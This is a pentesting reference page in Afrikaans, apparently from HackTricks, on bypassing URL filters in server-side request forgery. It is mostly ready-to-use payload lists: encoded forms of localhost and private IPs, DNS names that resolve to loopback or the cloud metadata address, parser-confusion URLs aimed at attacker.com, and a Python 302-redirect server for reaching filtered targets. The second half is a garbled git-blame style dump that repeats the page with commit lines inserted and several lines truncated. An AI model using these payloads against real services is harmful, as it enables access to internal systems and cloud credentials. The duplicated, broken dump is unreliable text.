hacktricks/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md

# URL Formaat Bypass

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**intekening planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

### Localhost
```bash
# Localhost
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://127.000000000000000.1
http://0
http:@0/ --> http://localhost/
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪

# CDIR bypass
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

# Dot bypass
127。0。0。1
127%E3%80%820%E3%80%820%E3%80%821

# Decimal bypass
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1

# Octal Bypass
http://0177.0000.0000.0001
http://00000177.00000000.00000000.00000001
http://017700000001

# Hexadecimal bypass
127.0.0.1 = 0x7f 00 00 01
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20
0x7f.0x00.0x00.0x01
0x0000007f.0x00000000.0x00000000.0x00000001

# Mixed encodings bypass
169.254.43518 -> Partial Decimal (Class B) format combines the third and fourth parts of the IP address into a decimal number
0xA9.254.0251.0376 -> hexadecimal, decimal and octal

# Add 0s bypass
127.000000000000.1

# You can also mix different encoding formats
# https://www.silisoftware.com/tools/ipconverter.php

# Malformed and rare
localhost:+11211aaa
localhost:00011211aaaa
http://0/
http://127.1
http://127.0.1

# DNS to localhost
localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1
```
![](<../../.gitbook/assets/image (776).png>)

Die **Burp-uitbreiding** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implementeer IP-formaat omseilings.

### Domein Parser
```bash
https:attacker.com
https:/attacker.com
http:/\/\attacker.com
https:/\attacker.com
//attacker.com
\/\/attacker.com/
/\/attacker.com/
/attacker.com
%0D%0A/attacker.com
#attacker.com
#%20@attacker.com
@attacker.com
http://169.254.1698.254\@attacker.com
attacker%00.com
attacker%E3%80%82com
attacker。com
ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ
```

```
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```
### Domein Verwarring
```bash
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
# Try replacing https by http
# Try URL-encoded characters
https://{domain}@attacker.com
https://{domain}.attacker.com
https://{domain}%6D@attacker.com
https://attacker.com/{domain}
https://attacker.com/?d={domain}
https://attacker.com#{domain}
https://attacker.com@{domain}
https://attacker.com#@{domain}
https://attacker.com%23@{domain}
https://attacker.com%00{domain}
https://attacker.com%0A{domain}
https://attacker.com?{domain}
https://attacker.com///{domain}
https://attacker.com\{domain}/
https://attacker.com;https://{domain}
https://attacker.com\{domain}/
https://attacker.com\.{domain}
https://attacker.com/.{domain}
https://attacker.com\@@{domain}
https://attacker.com:\@@{domain}
https://attacker.com#\@{domain}
https://attacker.com\anything@{domain}/
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com

# On each IP position try to put 1 attackers domain and the others the victim domain
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/

#Parameter pollution
next={domain}&next=attacker.com
```
### Paaie en Uitbreidings Omseiling

As jy vereis word dat die URL in 'n pad of 'n uitbreiding moet eindig, of 'n pad moet bevat, kan jy een van die volgende omseilings probeer:
```
https://metadata/vulerable/path#/expected/path
https://metadata/vulerable/path#.extension
https://metadata/expected/path/..%2f..%2f/vulnerable/path
```
### Fuzzing

Die hulpmiddel [**recollapse**](https://github.com/0xacb/recollapse) kan variasies genereer vanaf 'n gegewe invoer om te probeer om die gebruikte regex te omseil. Kyk na [**hierdie pos**](https://0xacb.com/2022/11/21/recollapse/) ook vir meer inligting.

### Automatic Custom Wordlists

Kyk na die [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) van portswigger waar jy die toegelate gasheer en die aanvallers een kan invoer en dit sal 'n lys van URL's genereer om te probeer. Dit oorweeg ook of jy die URL in 'n parameter, in 'n Host-header of in 'n CORS-header kan gebruik.

{% embed url="https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet" %}

### Bypass via redirect

Dit mag moontlik wees dat die bediener die **oorspronklike versoek** van 'n SSRF **filter**, maar nie 'n moontlike **redirect** antwoord op daardie versoek nie.\
Byvoorbeeld, 'n bediener wat kwesbaar is vir SSRF via: `url=https://www.google.com/` mag die **url param** **filter**. Maar as jy 'n [python-server gebruik om met 'n 302 te antwoord](https://pastebin.com/raw/ywAUhFrv) na die plek waar jy wil omlei, mag jy in staat wees om **gefilterde IP-adresse** soos 127.0.0.1 of selfs gefilterde **protokolle** soos gopher te **toegang**.\
[Kyk na hierdie verslag.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
```python
#!/usr/bin/env python3

#python3 ./redirector.py 8000 http://127.0.0.1/

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
print("Usage: {} <port_number> <url>".format(sys.argv[0]))
sys.exit()

class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', sys.argv[2])
self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```
## Verklaarde Trukke

### Blackslash-truk

Die _backslash-truk_ benut 'n verskil tussen die [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) en [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). Terwyl RFC3986 'n algemene raamwerk vir URI's is, is WHATWG spesifiek vir web-URL's en word dit deur moderne blaaiers aangeneem. Die sleutelonderskeid lê in die WHATWG-standaard se erkenning van die backslash (`\`) as gelyk aan die voorwaartse skuif (`/`), wat die manier waarop URL's geparseer word, beïnvloed, spesifiek die oorgang van die hostname na die pad in 'n URL.

![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)

### Linker vierkantige hakie

Die “linker vierkantige hakie” karakter `[` in die gebruikersinligtingsegment kan veroorsaak dat Spring se UriComponentsBuilder 'n hostname-waarde teruggee wat verskil van blaaiers: [https://example.com\[@attacker.com](https://portswigger.net/url-cheat-sheet#id=1da2f627d702248b9e61cc23912d2c729e52f878)

### Ander Verwirring

![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (600).png>)

beeld van [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)

## Verwysings

* [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)
* [https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet](https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet)

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hackingtricks deur PR's in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								# URL Formaat Bypass
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								{% hint style="success" %}
-												Translated ['network-services-pentesting/pentesting-web/php-tricks-esp/R

											
										
										
											2024-09-05 18:59:39 +00:00
+								Leer & oefen AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
 								Leer & oefen GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								<summary>Ondersteun HackTricks</summary>
-												arte

											
										
										
											2024-01-01 17:15:42 +00:00
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								* Kyk na die [**intekening planne**](https://github.com/sponsors/carlospolop)!
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['network-services-pentesting/pentesting-web/php-tricks-esp/R

											
										
										
											2024-09-05 18:59:39 +00:00
+								### Localhost
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								```bash
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# Localhost
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								http://127.0.0.1:80
 								http://127.0.0.1:443
 								http://127.0.0.1:22
 								http://127.1:80
-												GITBOOK-3885: change request with no subject merged in GitBook

											
										
										
											2023-04-30 22:29:45 +00:00
+								http://127.000000000000000.1
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								http://0
-												GitBook: [#3686] No subject

											
										
										
											2022-12-19 23:36:02 +00:00
+								http:@0/ --> http://localhost/
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								http://0.0.0.0:80
 								http://localhost:80
 								http://[::]:80/
 								http://[::]:25/ SMTP
 								http://[::]:3128/ Squid
 								http://[0000::1]:80/
 								http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
 								http://①②⑦.⓪.⓪.⓪
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# CDIR bypass
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								http://127.127.127.127
 								http://127.0.1.3
 								http://127.0.0.0
 								# Dot bypass
 。0。0。1
 %E3%80%820%E3%80%820%E3%80%821
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# Decimal bypass
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								http://2130706433/ = http://127.0.0.1
 								http://3232235521/ = http://192.168.0.1
 								http://3232235777/ = http://192.168.1.1
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# Octal Bypass
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								http://0177.0000.0000.0001
 								http://00000177.00000000.00000000.00000001
 								http://017700000001
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# Hexadecimal bypass
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+.0.0.1 = 0x7f 00 00 01
 								http://0x7f000001/ = http://127.0.0.1
 								http://0xc0a80014/ = http://192.168.0.20
 x7f.0x00.0x00.0x01
 x0000007f.0x00000000.0x00000000.0x00000001
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								# Mixed encodings bypass
 .254.43518 -> Partial Decimal (Class B) format combines the third and fourth parts of the IP address into a decimal number
 xA9.254.0251.0376 -> hexadecimal, decimal and octal
-												GITBOOK-3885: change request with no subject merged in GitBook

											
										
										
											2023-04-30 22:29:45 +00:00
+								# Add 0s bypass
 .000000000000.1
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# You can also mix different encoding formats
 								# https://www.silisoftware.com/tools/ipconverter.php
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# Malformed and rare
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								localhost:+11211aaa
 								localhost:00011211aaaa
 								http://0/
 								http://127.1
 								http://127.0.1
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# DNS to localhost
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								localtest.me = 127.0.0.1
 								customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
 								mail.ebc.apple.com = 127.0.0.6 (localhost)
 .0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
 								www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
 								http://customer1.app.localhost.my.company.127.0.0.1.nip.io
 								http://bugbounty.dod.network = 127.0.0.2 (localhost)
 ynrnhl.xip.io == 169.254.169.254
 								spoofed.burpcollaborator.net = 127.0.0.1
 								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								![](<../../.gitbook/assets/image (776).png>)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-03-26 15:51:04 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								Die **Burp-uitbreiding** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implementeer IP-formaat omseilings.
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-09 13:18:39 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								### Domein Parser
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								```bash
 								https:attacker.com
 								https:/attacker.com
 								http:/\/\attacker.com
 								https:/\attacker.com
 								//attacker.com
 								\/\/attacker.com/
 								/\/attacker.com/
 								/attacker.com
 								%0D%0A/attacker.com
 								#attacker.com
 								#%20@attacker.com
 								@attacker.com
-												GitBook: [#3723] No subject

											
										
										
											2023-01-02 12:00:18 +00:00
+								http://169.254.1698.254\@attacker.com
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								attacker%00.com
 								attacker%E3%80%82com
 								attacker。com
 								ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ
 								```
 								```
 								① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
 								⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
 								⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
 								⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
 								Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
 								ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								### Domein Verwarring
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								```bash
 								# Try also to change attacker.com for 127.0.0.1 to try to access localhost
-												Reorganize Domain Confusion list in SSRF

* Remove duplicates
* Add payloads
											
										
										
											2023-05-06 02:28:16 +00:00
+								# Try replacing https by http
 								# Try URL-encoded characters
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								https://{domain}@attacker.com
 								https://{domain}.attacker.com
-												Reorganize Domain Confusion list in SSRF

* Remove duplicates
* Add payloads
											
										
										
											2023-05-06 02:28:16 +00:00
+								https://{domain}%6D@attacker.com
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								https://attacker.com/{domain}
 								https://attacker.com/?d={domain}
-												Reorganize Domain Confusion list in SSRF

* Remove duplicates
* Add payloads
											
										
										
											2023-05-06 02:28:16 +00:00
+								https://attacker.com#{domain}
 								https://attacker.com@{domain}
 								https://attacker.com#@{domain}
 								https://attacker.com%23@{domain}
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								https://attacker.com%00{domain}
 								https://attacker.com%0A{domain}
 								https://attacker.com?{domain}
 								https://attacker.com///{domain}
 								https://attacker.com\{domain}/
 								https://attacker.com;https://{domain}
 								https://attacker.com\{domain}/
 								https://attacker.com\.{domain}
 								https://attacker.com/.{domain}
 								https://attacker.com\@@{domain}
 								https://attacker.com:\@@{domain}
 								https://attacker.com#\@{domain}
 								https://attacker.com\anything@{domain}/
-												Reorganize Domain Confusion list in SSRF

* Remove duplicates
* Add payloads
											
										
										
											2023-05-06 02:28:16 +00:00
+								https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
 								# On each IP position try to put 1 attackers domain and the others the victim domain
 								http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
 								#Parameter pollution
 								next={domain}&next=attacker.com
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								### Paaie en Uitbreidings Omseiling
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								As jy vereis word dat die URL in 'n pad of 'n uitbreiding moet eindig, of 'n pad moet bevat, kan jy een van die volgende omseilings probeer:
-												GitBook: [#3109] No subject

											
										
										
											2022-04-20 09:04:20 +00:00
+								```
 								https://metadata/vulerable/path#/expected/path
 								https://metadata/vulerable/path#.extension
 								https://metadata/expected/path/..%2f..%2f/vulnerable/path
 								```
-												GitBook: [#3670] No subject

											
										
										
											2022-12-05 11:09:36 +00:00
+								### Fuzzing
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								Die hulpmiddel [**recollapse**](https://github.com/0xacb/recollapse) kan variasies genereer vanaf 'n gegewe invoer om te probeer om die gebruikte regex te omseil. Kyk na [**hierdie pos**](https://0xacb.com/2022/11/21/recollapse/) ook vir meer inligting.
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								### Automatic Custom Wordlists
 								Kyk na die [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) van portswigger waar jy die toegelate gasheer en die aanvallers een kan invoer en dit sal 'n lys van URL's genereer om te probeer. Dit oorweeg ook of jy die URL in 'n parameter, in 'n Host-header of in 'n CORS-header kan gebruik.
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								{% embed url="https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet" %}
-												Translated ['network-services-pentesting/pentesting-web/php-tricks-esp/R

											
										
										
											2024-09-05 18:59:39 +00:00
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								### Bypass via redirect
-												Translated ['network-services-pentesting/pentesting-web/php-tricks-esp/R

											
										
										
											2024-09-05 18:59:39 +00:00
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								Dit mag moontlik wees dat die bediener die **oorspronklike versoek** van 'n SSRF **filter**, maar nie 'n moontlike **redirect** antwoord op daardie versoek nie.\
 								Byvoorbeeld, 'n bediener wat kwesbaar is vir SSRF via: `url=https://www.google.com/` mag die **url param** **filter**. Maar as jy 'n [python-server gebruik om met 'n 302 te antwoord](https://pastebin.com/raw/ywAUhFrv) na die plek waar jy wil omlei, mag jy in staat wees om **gefilterde IP-adresse** soos 127.0.0.1 of selfs gefilterde **protokolle** soos gopher te **toegang**.\
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								[Kyk na hierdie verslag.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								```python
 								#!/usr/bin/env python3
 								#python3 ./redirector.py 8000 http://127.0.0.1/
 								import sys
 								from http.server import HTTPServer, BaseHTTPRequestHandler
 								if len(sys.argv)-1 != 2:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								print("Usage: {} <port_number> <url>".format(sys.argv[0]))
 								sys.exit()
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
 								class Redirect(BaseHTTPRequestHandler):
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								def do_GET(self):
 								self.send_response(302)
 								self.send_header('Location', sys.argv[2])
 								self.end_headers()
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
 								HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
 								```
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								## Verklaarde Trukke
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								### Blackslash-truk
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								Die _backslash-truk_ benut 'n verskil tussen die [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) en [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). Terwyl RFC3986 'n algemene raamwerk vir URI's is, is WHATWG spesifiek vir web-URL's en word dit deur moderne blaaiers aangeneem. Die sleutelonderskeid lê in die WHATWG-standaard se erkenning van die backslash (`\`) as gelyk aan die voorwaartse skuif (`/`), wat die manier waarop URL's geparseer word, beïnvloed, spesifiek die oorgang van die hostname na die pad in 'n URL.
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-09 13:18:39 +00:00
+								![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								### Linker vierkantige hakie
 								Die “linker vierkantige hakie” karakter `[` in die gebruikersinligtingsegment kan veroorsaak dat Spring se UriComponentsBuilder 'n hostname-waarde teruggee wat verskil van blaaiers: [https://example.com\[@attacker.com](https://portswigger.net/url-cheat-sheet#id=1da2f627d702248b9e61cc23912d2c729e52f878)
